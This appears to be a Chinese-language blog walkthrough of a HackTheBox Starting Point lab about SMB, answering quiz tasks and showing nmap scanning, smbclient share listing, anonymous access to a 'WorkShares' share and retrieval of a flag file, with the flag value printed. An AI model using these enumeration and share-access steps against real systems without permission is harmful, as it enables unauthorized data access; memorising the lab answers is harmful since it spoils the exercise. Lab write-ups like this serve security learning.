首页 靶场练习 HackTheBox Staring Point

# Task 1

Q:What does the 3-letter acronym SMB stand for?

A:Server Message Block

# Task 2

Q:What port does SMB use to operate at?

A:445

# Task 3

Q:What network communication model does SMB use, architecturally speaking?

A:Client-Server Model

# Task 4

Q:What is the service name for port 445 that came up in our nmap scan?

问用 nmap 扫描 445 端口后识别出的服务名称

n
┌──(root💀kali)-[~]
└─# nmap -sV 10.129.53.193 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-28 19:39 CST
Nmap scan report for 10.129.53.193
Host is up (2.9s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.62 seconds

A:microsoft-ds
# Task 5
Q:What is the tool we use to connect to SMB shares from our Linux distribution?

A:smbclient
# Task 6
Q:What is the flag or switch we can use with the SMB tool to list the contents of the share?

A: -L
┌──(root💀kali)-[~]
└─# smbclient -L 10.129.53.193
Enter WORKGROUP\root's password: 
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.53.193 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
# Task 7
Q:What is the name of the share we are able to access in the end?

通过上面可以看到 Sharename 里有 4 个用户,其中带有 $ 的都是管理员权限,所以我们只能连接 WorkShares

A:WorkShares
# Task 8
Q:What is the command we can use within the SMB shell to download the files we find?

A:get
# Task 9
Q:Submit root flag

这个我他妈直接 GG,
┌──(root💀kali)-[/etc]
└─# smbclient \\\\10.219.53.193\\WorkShares
do_connect: Connection to 10.219.53.193 failed (Error NT_STATUS_IO_TIMEOUT)

超时了

我手动重连了 openVPN,就能连上了

发现我虚拟机挂起后重新启动后机器就 ping 不通了,需要手动重启一下 openVPN。

小细节 Get!
┌──(root💀kali)-[~/桌面]
└─# smbclient \\\\10.129.227.16\\WorkShares                            130 ⨯
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> ls
.                                   D        0  Mon Mar 29 16:22:01 2021
..                                  D        0  Mon Mar 29 16:22:01 2021
Amy.J                               D        0  Mon Mar 29 17:08:24 2021
James.P                             D        0  Thu Jun  3 16:38:03 2021
5114111 blocks of size 4096. 1732182 blocks available
smb: \> cd James.P\
smb: \James.P\> ls
.                                   D        0  Thu Jun  3 16:38:03 2021
..                                  D        0  Thu Jun  3 16:38:03 2021
flag.txt                            A       32  Mon Mar 29 17:26:57 2021
5114111 blocks of size 4096. 1732182 blocks available
smb: \James.P\> get flag.txt 
getting file \James.P\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
flag
┌──(root💀kali)-[~/桌面]
└─# cat flag.txt                                                       130 ⨯
5f61c10dffbc77a704d76016a22f1664